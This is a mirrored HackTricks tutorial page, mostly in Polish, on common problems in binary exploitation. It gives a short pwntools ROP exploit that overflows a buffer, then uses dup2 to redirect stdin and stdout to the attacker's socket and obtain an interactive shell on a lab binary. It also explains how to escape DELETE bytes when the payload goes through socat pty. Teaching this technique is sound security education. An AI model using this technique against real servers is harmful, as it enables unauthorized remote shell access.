Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 20:53:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/binary-exploitation/common-exploiting-problems.md

3.8 KiB
Raw Blame History

Common Exploiting Problems

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

FDs w Zdalnym Wykorzystaniu

Kiedy wysyłasz exploit do zdalnego serwera, który wywołuje system('/bin/sh'), na przykład, zostanie to wykonane w procesie serwera, a /bin/sh będzie oczekiwał na dane wejściowe z stdin (FD: 0) i będzie drukował wyjście w stdout i stderr (FDs 1 i 2). Tak więc atakujący nie będzie mógł interagować z powłoką.

Sposobem na naprawienie tego jest założenie, że kiedy serwer się uruchomił, utworzył FD numer 3 (do nasłuchiwania) i że następnie, twoje połączenie będzie w FD numer 4. Dlatego możliwe jest użycie syscall dup2, aby zduplikować stdin (FD 0) i stdout (FD 1) w FD 4 (tym od połączenia atakującego), co umożliwi kontakt z powłoką, gdy zostanie ona wykonana.

Przykład exploita stąd:

from pwn import *

elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)

rop = ROP(elf)
rop.raw('A' * 40)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.win()

p.sendline(rop.chain())
p.recvuntil('Thanks!\x00')
p.interactive()

Socat & pty

Zauważ, że socat już przesyła stdin i stdout do gniazda. Jednak tryb pty zawiera znaki DELETE. Więc, jeśli wyślesz \x7f ( DELETE -) to usunie poprzedni znak twojego exploita.

Aby to obejść, znak ucieczki \x16 musi być dodany przed każdym wysłanym \x7f.

Tutaj możesz znaleźć przykład tego zachowania.

{% hint style="success" %} Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie dla HackTricks
{% endhint %}